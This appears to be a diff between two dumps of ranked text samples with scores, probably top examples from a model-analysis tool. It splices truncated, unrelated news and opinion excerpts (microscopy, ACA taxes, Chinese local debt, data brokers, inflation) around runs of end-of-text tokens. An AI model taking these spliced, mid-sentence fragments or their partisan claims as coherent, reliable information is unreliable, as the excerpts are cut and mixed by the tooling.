d_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +The responsible way a civil society can handle drugs, regardless of how dangerous they are, is through community institutions. Many Americans want nothing to do with drugs. Private organizations can discourage use. Property owners can exclude behavior they dislike from their premises. Meanwhile, those seeking help can get ================================================================================ -Rank = 91; Score = 589824.0 -<|begin_of_text|>Most measuring instruments are limited by the tradeoff between how precisely and how rapidly a measurement is made: the more precise the measurement, the longer it takes. But because many phenomena occurring at the nanoscale are both rapid and tiny, they demand a measuring system that can capture their precise details in both time and space. +Rank = 92; Score = 303104.0 +<|begin_of_text|>Cheng Siwei, head of Beijing's International Finance Forum and a former deputy speaker of the People's Congress, said interest rate rises and credit curbs to cool overheating were inflicting real pain on thousands of companies used by local party bosses to fund the construction boom. -Taking up that challenge, researchers at the National Institute of Standards and Technology (NIST) have redesigned the detection system at the heart of the atomic force microscope (AFM). A premier tool of the nanoworld, the AFM uses a small probe, or tip, to map the submicroscopic hills and valleys that define the surface of materials, along with other properties, at the nanometer scale. Although the AFM has already revolutionized the understanding of nanostructures, scientists are now eager to study nanoscale phenomena, such as the folding of proteins or the diffusion of heat, which happen too quickly and generate changes too small to be accurately measured by existing versions of the microscope. +"The tightening policy is creating a lot of difficulties for local governments trying to repay debt, and is causing defaults," he told a meeting at the World Economic Forum in Dalian. "Our version of subprime in the US is lending to local authorities and the government is taking this very seriously." -By fabricating an extremely lightweight AFM probe and combining it with a nanoscale device that converts minuscule deflections of the probe into large changes of an optical signal inside a waveguide, the NIST researchers have broken new ground: Their AFM system measures rapid changes in structure with high precision. +"Everybody assumes that they will be bailed out by the central government if they default, but I disagree with this. It means that the people will ultimately pay the bill for it all, at a cost to the broader welfare." -Illustration of a newly fabricated atomic force microscope (AFM) probe integrated with an optical, disk-shaped resonator. Combined with a technique called photothermal induced resonance (PTIR), which uses infrared light to examine a material’s composition, the incorporation of the resonator enables the probe to make high-precision measurements of minuscule, rapid changes in a material. Credit: NIST +"Those who are not highly indebted are forced to help those who are," he said, echoing the debate over moral hazard that has divided opinion in the West since the banking rescues. -The achievement takes the AFM into a new realm, enabling the instrument to measure time-varying nanoscale processes that may change as quickly as ten billionths of a second. “This is truly a transformational advance,” said NIST scientist Andrea Centrone. +Local governments have created more than 6,000 arms-length companies to circumvent restrictions on bond issuance, creating a huge patronage machine for party bosses that has largely escaped central control. -Centrone, Vladimir Aksyuk, and their colleagues employed the new AFM capabilities in experiments using photothermal induced resonance (PTIR), a technique that combines the acuity of an AFM with the ability to determine the composition of materials using infrared light. +The audit office said the loans have reached $1.7 trillion (£1 trillion). While some of the money has been used to finance much-needed investments in water systems and roads, a large part has fuelled unbridled construction with a dubious rate of return. -With the new AFM-PTIR system, the scientists measured with high precision the rapid, but minute expansion of individual microcrystals heated by a light pulse. The microcrystals examined by the team belong to a class of materials known as metal-organic frameworks (MOFs). These materials contain -================================================================================ -Rank = 92; Score = 589824.0 -<|begin_of_text|>Cells from Mr Turnbull's good eye were transplanted into his damaged one A man partially blinded in an attack on Tyneside has praised scientists who restored his vision using stem cells. Russell Turnbull, 38, lost the sight in one eye in 1994 when he was squirted with ammonia after intervening in an argument on a bus in Newcastle. He was left with Limbal Stem Cell Deficiency (LSCD), a painful condition which requires constant treatment. He said the Newcastle University team which developed the treatment had "transformed his life". The method involves taking a small amount of stem cells from a patient's good eye, cultivating them in a laboratory, and implanting them into the damaged cornea. Mr Turnbull, from Consett, County Durham, was treated at Newcastle's Royal Victoria Infirmary (RVI). He said: "I had a lot of anger inside me for a long time after the attack. I lost my job because of it and I had always been a keen jet skier, which I wasn't able to do. Please turn on JavaScript. Media requires JavaScript to play. "It ruined my life and I went through a really difficult time. But then this treatment came along. I can't thank the staff at the RVI enough. "This has transformed my life. My eye is almost as good as it was before the accident. I'm working, I can go jet skiing again and I also ride horses. I have my life back thanks to the operation." He is one of of eight patients who successfully underwent the treatment developed at the North East England Stem Cell Institute (NESCI). It is hoped that the technique could eventually be rolled out into clinics. +The local governments depend on land sales for 40pc of their revenue so the process has become incestuous and self-feeding. Such reliance on property sales revenues has greatly aggravated the post-bubble crisis in Ireland. -Bookmark with: Delicious +Mr Cheng said China is entering a "very tough period" as growth runs into the inflation buffers, threatening the sort of incipient stagflation seen in the West in the 1970s and leaving the central bank with an unpleasant choice. "The inflation rate and the growth rate are conflicting with each other: it is very troubling," he said, describing what is known to economists as the Phillips Curve dilemma.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 93; Score = 303104.0 +<|begin_of_text|>“Home life ceases to be free and beautiful as soon as it is founded on borrowing and debt” Henrik Ibsen -Digg +According to Oxford Dictionary the term Slave is defined as “a person who is the legal property of another and is forced to obey them” as in the case of the United States during the 18th and 19th centuries where slavery was a legalized institution. Oxford dictionary also defines slavery as “a person who works very hard without proper remuneration or appreciation” as in today’s world of a person working for a company or corporation where their efforts are usually under appreciated. It also describes a slave as “a person who is excessively dependent upon or controlled by something” or “a device, or part of one, directly controlled by another”. Debt can be an instrument used to control an individual or a nation for that matter. In this case, an individual is dependent upon “Credit” to buy products. -reddit +Then the credit becomes a debt that has to be repaid. It becomes a “control mechanism” as the creditor becomes the “Slave Owner” and the debtor becomes the “Slave”. What is the point? In today’s world of unlimited credit, consumers become modern-day slaves to their creditors. What is the difference between slavery in 18th century America with imported African slaves and the America of 2013? There is no difference besides the physical abuse of the African slaves by their owners. In America, consumers suffer psychological abuse by its creditors. As long as an individual remains in debt bondage, that person will have to repay that debt until the day that person literally dies in most cases. -Facebook +Black Friday is the day that starts the most important holiday for big name retailers and Wall Street speculators and that is Christmas. It is the shopping season that investors, economists and corporations pay close attention to as they measure consumer confidence and the profits they reap from consumer spending. Major retailers and corporations such as Wal-Mart expect to make profits. Wall Street expects consumers to spend on Black Friday through the Christmas holidays following the Federal Reserve’s continued policies of Quantitative Easing (QE). Economists across the spectrum predict that the new Federal Reserve chairwoman Janet Yellen will continue to buy US bonds indefinitely continuing Ben Bernanke’s current policies. -StumbleUpon What are these? E-mail this to a friend Printable version<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +All the while consumers continue to accumulate debt. Black Friday was marked with chaos followed by violence as mobs of consumers’ raided shopping centers and malls for discounts and sales on numerous products including flat screen televisions, toys, clothing and other goods they most likely don’t need. Regardless of the economic ================================================================================ -Rank = 93; Score = 589824.0 -<|begin_of_text|>Republicans in Congress have already voted to cut the taxes that pay for the Affordable Care Act (ACA). Up to now these tax cuts have been vetoed by President Obama. But with the inauguration of Donald Trump, Republicans in the Senate and House will be free to cut ACA taxes and give hundreds of billions of dollars to the richest Americans. +Rank = 94; Score = 303104.0 +<|begin_of_text|>In a report issued today on the data broker industry, the Federal Trade Commission finds that data brokers operate with a fundamental lack of transparency. The Commission recommends that Congress consider enacting legislation to make data broker practices more visible to consumers and to give consumers greater control over the immense amounts of personal information about them collected and shared by data brokers. -The ACA taxes include a 3.8% tax on investment income, which mainly goes to the top 1%. Investment income is not taxed to pay for Medicare or Social Security. There is also a 0.9% tax on individuals with very large salaries, which is also not taxed to pay for Social Security. Social Security taxes only tax the first $127,200 in earned income; any income above that or investment income is not taxed. +The report, “Data Brokers: A Call for Transparency and Accountability” is the result of a study of nine data brokers, representing a cross-section of the industry, undertaken by the FTC to shed light on the data broker industry. Data brokers obtain and share vast amounts of consumer information, typically behind the scenes, without consumer knowledge. Data brokers sell this information for marketing campaigns and fraud prevention, among other purposes. Although consumers benefit from data broker practices which, for example, help enable consumers to find and enjoy the products and services they prefer, data broker practices also raise privacy concerns. -What this means is that eliminating the taxes for the ACA would provide the top one-tenth of one percent (0.1%) of Americans an average tax cut of almost $200,000 a year, which would be almost 75% of the total dollar tax cut. +“The extent of consumer profiling today means that data brokers often know as much – or even more – about us than our family and friends, including our online and in-store purchases, our political and religious affiliations, our income and socioeconomic status, and more,” said FTC Chairwoman Edith Ramirez. “It’s time to bring transparency and accountability to bear on this industry on behalf of consumers, many of whom are unaware that data brokers even exist.” -These ACA taxes on households raise about $100 billion a year, which along with ACA taxes on health insurance companies, drug and medical equipment manufacturers, and others, pay for ACA. One cost of the ACA are the premium tax credit where the federal government will reimburse low and middle-income households that purchase health insurance through a government exchange for all or part of their health insurance premiums. Another cost is the expansion of Medicaid for low-income Americans. +The report finds that data brokers collect and store billions of data elements covering nearly every U.S. consumer. Just one of the data brokers studied holds information on more than 1.4 billion consumer transactions and 700 billion data elements and another adds more than 3 billion new data points to its database each month. -The elimination of the ACA and the premium tax credits which subsidize the government insurance exchange would cause dramatic losses for about 4% of the population, who would lose insurance subsidies that average almost $5000 each year. While most the poorest 20% of American households, earning less than $25,000 per year, would not see much of a loss in subsidies, they are the ones who are most likely to lose insurance with the elimination of the ACA and its expansion of Medicaid. Eliminating the Medicaid expansion could cause almost 11 million to lose their insurance. +Among the report’s findings: -It is no wonder that the wealthiest businesspeople and Wall Street tycoons who are represented by billionaire President-elect Donald Trump are so keen to eliminate the ACA. But their gains would come at the cost of higher health insurance premiums and loss of health insurance for millions of workers and small business owners.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 94; Score = 585728.0 -<|begin_of_text|>Not to be confused with the fictional system portayed in The Last Enemy (TV series) +Data brokers collect consumer data from extensive online and offline sources, largely without consumers’ knowledge, ranging from consumer purchase data, social media activity, warranty registrations, magazine subscriptions, religious and political affiliations, and other details of consumers’ everyday lives. -Total Information Awareness system from the official (decommissioned) Diagram of thesystem from the official (decommissioned) Information Awareness Office website +Consumer data often passes through multiple layers of data brokers sharing data with each other. In fact, seven of the nine data brokers in the Commission study had shared information with another data broker in the study. -Presentation slide produced by DARPA describing TIA +Data brokers combine online and offline data to market to consumers online. -Total Information Awareness (TIA) was a program of the United States Information Awareness Office that began during the 2003 fiscal year. It operated under this title from February until May 2003, before being renamed as the Terrorism Information Awareness.[1][2] +Data brokers combine and analyze data about consumers to make inferences about them, including potentially sensitive inferences such as those related to ethnicity, income, religion, political leanings, age, and health conditions. Potentially sensitive categories from the study are “Urban Scramble” and “Mobile Mixers,” both of which include a high +================================================================================ +Rank = 95; Score = 303104.0 +<|begin_of_text|>Draghi (foto Afp) -Based on the concept of predictive policing, TIA aimed to gather detailed information about individuals in order to anticipate and prevent crimes before they are committed.[3] As part of efforts to win the War on Terror, the program searched for all sorts of personal information in the hunt for terrorists around the globe.[4] Admiral John Poindexter referred to it as a "Manhattan Project for Counter-Terrorism".[5] According to Senator Ron Wyden (D-Ore.), TIA was the "biggest surveillance program in the history of the United States".[6] +L'Europa cresce ininterrottamente da 15 mesi, l'inflazione sale e il tasso di disoccupazione è tornato a una sola cifra. Tutte ottime notizie per l'Eurozona ma che inevitabilmente si vanno a intrecciare con le politiche della Bce che, secondo quanto riporta il Foglio, potrebbe decidere l'interruzione totale del quantitative easing a partire dal 2018. Si aprirebbe così una nuova fase di incertezza e per la politica italiana sarebbe consigliabile arrivare alla fine del Qe con un governo stabile che si giochi la partita della flessibilità con l'Europa con più forza rispetto a oggi. -The program was defunded alongside the Information Awareness Office in late 2003 by the United States Congress after media reports criticized the government for attempting to establish "Total Information Awareness" over all citizens.[7][8][9] +Cos'è il 'bazooka' Qe? -Although the program was formally suspended, its data mining software was later adopted by other government agencies, with only superficial changes being made. The core architecture of TIA continued development under the code name "Basketball." According to a 2012 New York Times article, the legacy of Total Information Awareness is "quietly thriving" at the National Security Agency (NSA).[10] +Il quantitative easing è uno strumento non convenzionale di politica monetaria, in grado di assicurare la permanenza dell'inflazione al di sopra di una certo valore-obiettivo, fissato dalla Bce "sotto, ma vicino" al 2%. In pratica, la Banca Centrale aumenta la base monetaria - banconote più depositi alla banca centrale - con operazioni di mercato aperto, e la inietta nel sistema finanziario ed economico attraverso l'acquisto di prodotti finanziari, come i titoli di Stato. Più si stampa moneta, più la valuta si deprezza e a guadagnarci è l'export Ue. Altro vantaggio è l'abbassamento dei tassi di interesse. -Program synopsis [ edit ] +L'Europa va come un treno -Total Information Awareness (TIA) was intended to be a five year long research project by the Defense Advanced Research Projects Agency (DARPA). The goal was to integrate components from previous and brand new government intelligence and surveillance programs, including Genoa, Genoa II, Genisys, SSNA, EELD, WAE, TIDES, Communicator, HumanID and Bio-Surveillance with data mining knowledge gleamed from the private sector to create a resource for the intelligence, counterintelligence, and law enforcement communities.[11][12] These components consisted of information analysis, collaboration, decision-support tools, language translation, data-searching, pattern recognition, and privacy-protection technologies.[13] +Nel 2016, la crescita del'area euro ha superato quella degli Stati Uniti (1,7 contro 1,6) -TIA research included or planned to include the participation of nine government entities: INSC -================================================================================ -Rank = 95; Score = 581632.0 -<|begin_of_text|>(NaturalNews) Two out of every three store-bought chickens may be contaminated with bacteria that commonly cause human illness, according to a study conducted by the Consumers Union."Consumers still need to be very careful in handling chicken, which is routinely contaminated with disease-causing bacteria," said Urvashi Rangan, the union's director of technical policy.Researchers conducted tests on 382 fresh broiler chickens purchased at 100 retailers in 22 states in spring 2009. A full two-thirds of the chickens were contaminated with either one or both of the bacteria strains most often responsible for food-borne illness. Although this figure is an improvement over the 2007 figure of 80 percent, the Consumers Union still called the numbers "far too high" and called for stricter government regulation.Sixty-two percent of chickens tested positive for campylobacter, the number two cause of food-borne illness. Fourteen percent tested positive for salmonella, the number one cause, and 9 percent tested positive for both.In contrast, the U.S. Department of Agriculture found only 5 percent of chickens contaminated with salmonella in its tests of chicken packing plants in April, May and June 2009. The Consumers Union noted that its own tests were conducted farther down the supply chain, when more opportunities for contamination had arisen. It also pointed to prior studies finding widespread campylobacter contamination at chicken processing plants, and called upon the government to set a maximum safe threshold for levels of the bacteria.Although cooking destroys both salmonella and campylobacter contamination, people can be exposed to the pathogens while cooking or otherwise processing the raw meat. In addition, contamination can spread from uncooked chicken to other foods more commonly eaten raw. For this reason, health experts recommend that chicken always be bagged separately from other foods and refrigerated or frozen within two hours of purchase. The Centers for Disease Control and Prevention recommend keeping a separate cutting board exclusively for use on uncooked poultry, in order to prevent contamination of other foods.Sources for this story include: abcnews.go.com.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> -================================================================================ -Rank = 96; Score = 577536.0 -<|begin_of_text|>Infosys is handling much of the IT infrastructure for Goods and Services Tax Network (GSTN). +del'area euro ha superato quella degli Stati Uniti (1,7 contro 1,6) Il tasso di disoccupazione è a 9,6% -Highlights GST Council appointed the GoM to check tech issues related to GSTN The GoM is headed by Bihar Deputy Chief Minister Sushil Kumar Modi Infosys is handling much of the IT infrastructure for GSTN +è a 9,6% L'indice Pmi (attività manifatturiera) è in espansione da 43 mesi consecutivi -A group of ministers (GoM) - appointed by the Goods and Services Tax (GST) Council to look into the technical challenges that have been facing after the launch of this massive tax reform - met today in Bengaluru. The GoM is headed by Bihar Deputy Chief Minister Sushil Kumar Modi.Representatives from Infosys were also part of the meet. Infosys is handling much of the IT infrastructure for GST Network (GSTN).It is no secret that the implementation of that biggest tax reform GST has not been as smooth as desired. "The systems had not crashed...and that the pressure was due to the scale of operations and last minute rush by tax payers," Mr Modi said.He also said that, "22 crore invoices have been filed in two and a half months and 85 lakhs new and old dealers have been registered under GST."He further stated, "I want to appeal to tax payers that they should not wait for the last day. Because of that there is a heavy rush for the system. Only five days left for August filing and only 3.05 lakh have filed form 3B compared to more than 45 lakh in July...so there will be a rush."We will be able to solve the nitty-gritties found in the IT system, he added.Infosys, which is handling the GSTN, was represented at the meet. And, the government defended the IT major's role. Revenue Secretary Hasmukh Adhia said, "Infosys has not failed. They have been delivering very well. Hiccups will be there which need to be sorted out."The team insisted the glitches were minor and included non-availability of some forms online or difficulty for the user in changing some fields. The GoM will meet again soon - probably in Bengaluru again - as Infosys is headquartered in the city.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +Questi fattori, sommati al rialzo del prezzo del petrolio, hanno portato l'inflazione a raggiungere quota 1, ================================================================================ -Rank = 97; Score = 577536.0 -<|begin_of_text|>These capitalists generally act harmoniously and in concert, to fleece the people. - -—Abraham Lincoln, from his first speech as an Illinois state legislator, 1837 - -Everyone now is more or less a Socialist. - -—Charles Dana, managing editor of the New York Tribune, and Lincoln’s assistant secretary of war, 1848 +Rank = 96; Score = 299008.0 +<|begin_of_text|>The brain - awake and sleeping - is awash in electrical activity, and not just from the individual pings of single neurons communicating with each other. In fact, the brain is enveloped in countless overlapping electric fields, generated by the neural circuits of scores of communicating neurons. The fields were once thought to be an "epiphenomenon, a 'bug' of sorts, occurring during neural communication," says neuroscientist Costas Anastassiou, a postdoctoral scholar in biology at the California Institute of Technology (Caltech). -The workingmen of Europe feel sure that, as the American War of Independence initiated a new era of ascendancy for the middle class, so the American Antislavery War will do for the working classes. They consider it an earnest of the epoch to come that it fell to the lot of Abraham Lincoln, the single-minded son of the working class, to lead his country through the matchless struggle for the rescue of an enchained race and the reconstruction of a social world. +New work by Anastassiou and his colleagues, however, suggests that the fields do much more - and that they may, in fact, represent an additional form of neural communication. -—Karl Marx and the First International Workingmen’s Association to Lincoln, 1864 +"In other words," says Anastassiou, the lead author of a paper about the work appearing in the journal Nature Neuroscience, "while active neurons give rise to extracellular fields, the same fields feed back to the neurons and alter their behavior," even though the neurons are not physically connected - a phenomenon known as ephaptic coupling. "So far, neural communication has been thought to occur at localized machines, termed synapses. Our work suggests an additional means of neural communication through the extracellular space independent of synapses." -ON DECEMBER 3, 1861, a former one-term congressman, who had spent most of the past dozen years studying dissident economic theories, mounting challenges to the existing political order and proposing ever more radical responses to the American crisis, delivered his first State of the Union address as the sixteenth president of the United States. +Extracellular electric fields exist throughout the living brain, though they are particularly strong and robustly repetitive in specific brain regions such as the hippocampus, which is involved in memory formation, and the neocortex, the area where long-term memories are held. "The perpetual fluctuations of these extracellular fields are the hallmark of the living and behaving brain in all organisms, and their absence is a strong indicator of a deeply comatose, or even dead, brain," Anastassiou explains. -Since assuming office eight months earlier, this new president had struggled, without success, first to restore the severed bonds of the Union and then to avert a wrenching civil war. Now, eleven southern slave states were in open and violent rebellion against the government he led. +Previously, neurobiologists assumed that the fields were capable of affecting - and even controlling - neural activity only during severe pathological conditions such as epileptic seizures, which induce very strong fields. Few studies, however, had actually assessed the impact of far weaker - but very common - non-epileptic fields. "The reason is simple," Anastassiou says. "It is very hard to conduct an in vivo experiment in the absence of extracellular fields," to observe what changes when the fields are not around. -His inaugural address of the previous spring had closed with a poignant reflection on the prospect of eventual peace, imagining a day when the Union might again be touched “by the better angels of our nature.” But, now, in the last month of what Walt Whitman would recall as America’s “sad, distracted year”—“Year that suddenly sang by the mouths of the round-lipp’d cannons”—the better angels seemed to have deserted the continent. Every effort to restore the republic had been thwarted. There was no room for accommodation with the Confederate States of America. Fort Sumter had been fired upon and the flag of southern rebellion now flew above Charleston Harbor. Virginia, the cradle of presidents, the state of Washington, Jefferson and Madison, had joined the revolt and assembled a capital of the Confederacy less than 100 miles from Washington. Hundreds of Union and Confederate soldiers had died, with thousands more wounded at the First Battle of Bull Run. Armies had been reorganized and generals replaced with the recognition that this was no skirm +To tease out those effects, Anastassiou and his colleagues, including Caltech neuroscientist Christof Koch, the Lois and Victor Troendle Professor of Cognitive and Behavioral Biology and professor of computation and neural systems, focused on strong but slowly oscillating fields, called local field potentials (L ================================================================================ -Rank = 98; Score = 569344.0 -<|begin_of_text|>The Formula One World Constructors' Championship (WCC) is awarded by the FIA to the most successful Formula One constructor over a season, as determined by a points system based on Grand Prix results. The Constructors' Championship was first awarded, as the International Cup for F1 Manufacturers, in 1958 to Vanwall. - -Constructors' Championship points are calculated by adding points scored in each race by any driver for that constructor. Up until 1979, most seasons saw only the highest-scoring driver in each race for each constructor contributing points towards the Championship. On only ten occasions has the World Constructors' Champion team not contained the World Drivers' Champion for that season. +Rank = 97; Score = 299008.0 +<|begin_of_text|>Andy Blatchford, The Canadian Press -In the 61 seasons the Championship has been awarded, only 15 different constructors have won it, with Scuderia Ferrari the most successful, with 16 titles including 6 consecutive from 1999 to 2004. Only five countries have produced winning constructors: United Kingdom (33 championships with 10 different constructors), Italy (16 with Ferrari), Germany (5 with Mercedes), Austria (4 with Red Bull) and France (3 with two constructors). However, all German, Austrian and French titles have seen the winning cars designed and built (except Matra in 1969) and run by teams based in the United Kingdom. Among drivers that have contributed with at least a single point to the constructors' title, Michael Schumacher has the unofficial record, having been involved with seven such titles, six of those consecutively with Ferrari.[1] Schumacher won the world drivers' title on six of those seven occasions. +OTTAWA -- Fuelled by climbing prices for fresh fruits and vegetables, the pace of Canada's annual inflation rate accelerated last month to 1.6 per cent, Statistics Canada said Friday. -By season [ edit ] +Inflation grew at its fastest pace in December since late 2014. Last month's number also followed a 1.4 per cent year-over-year increase in November, the agency's latest consumer price index found. -The constructors' trophy +The figure came out as the economy deals with the effects of the steep slide in commodity and oil prices, which have also helped drag down Canada's exchange rate. The lower loonie is expected to drive up costs for imported goods. -Notes [ edit ] +The report said prices for fresh fruit increased 13.2 per cent last month compared to a year earlier, while fresh vegetables rose 13.3 per cent. -* – indicates that the driver also won the Drivers' Championship. +The price of lettuce surged 21.8 per cent. -By constructor [ edit ] +Overall, consumers spent 3.7 per cent more on food last month than the previous year. -Note: Constructors in bold have competed in the 2018 World Championship. +On top of higher produce prices, Canadians were also paying considerably more for home and mortgage insurance, automobiles and electricity compared to a year earlier, the report said. -By nationality [ edit ] +The agency said lower prices for gasoline, natural gas and fuel oil applied downward pressure on inflation. Gasoline prices were down 4.8 per cent compared to December 2014, while natural gas decreased 12.9 per cent and fuel oil dropped by 16.8 per cent. -By engine [ edit ] +But the slipping price of energy slowed somewhat, which allowed overall inflation to creep up, said Dawn 